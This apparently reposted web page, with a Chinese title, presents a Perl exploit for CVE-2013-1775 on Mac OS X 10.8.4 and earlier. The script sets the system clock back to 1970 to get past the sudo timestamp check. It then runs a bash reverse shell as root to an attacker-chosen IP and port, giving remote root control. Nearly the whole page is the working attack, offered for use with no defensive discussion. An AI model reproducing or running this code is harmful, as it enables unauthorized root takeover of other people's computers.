# CVE-2013-1775 Apple Mac OSX 10.8.4 權限提升漏洞
==EXP==
#!/usr/bin/env perl
$num_args = $#ARGV + 1;
if ($num_args != 2) {
print "\nUsage: exploit.pl ip.add.re.ss port\n";
exit;
}
print "\n";
print "=============================================================================================================\n";
print " - OSX <= 10.8.4 Local Root Priv Escalation Root Reverse Shell by ";
print " - [Bek Umarov @ HackEd]\n";
print " - Reference: http://www.exploit-db.com/exploits/27965/\n";
print "=============================================================================================================\n";
print "\n";
my $ipaddr = @ARGV[0];
my $port = @ARGV[1];
my $proc = `systemsetup -setusingnetworktime Off -settimezone GMT -setdate 01:01:1970 -settime 00:00;sudo su -c "bash -i >& /dev/tcp/$ipaddr/$port 0>&1 &"`;
print "[*] Exploit has been performed. You should have a shell on ipaddr: $ipaddr and port $port\n\n";
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END













请登录后查看评论内容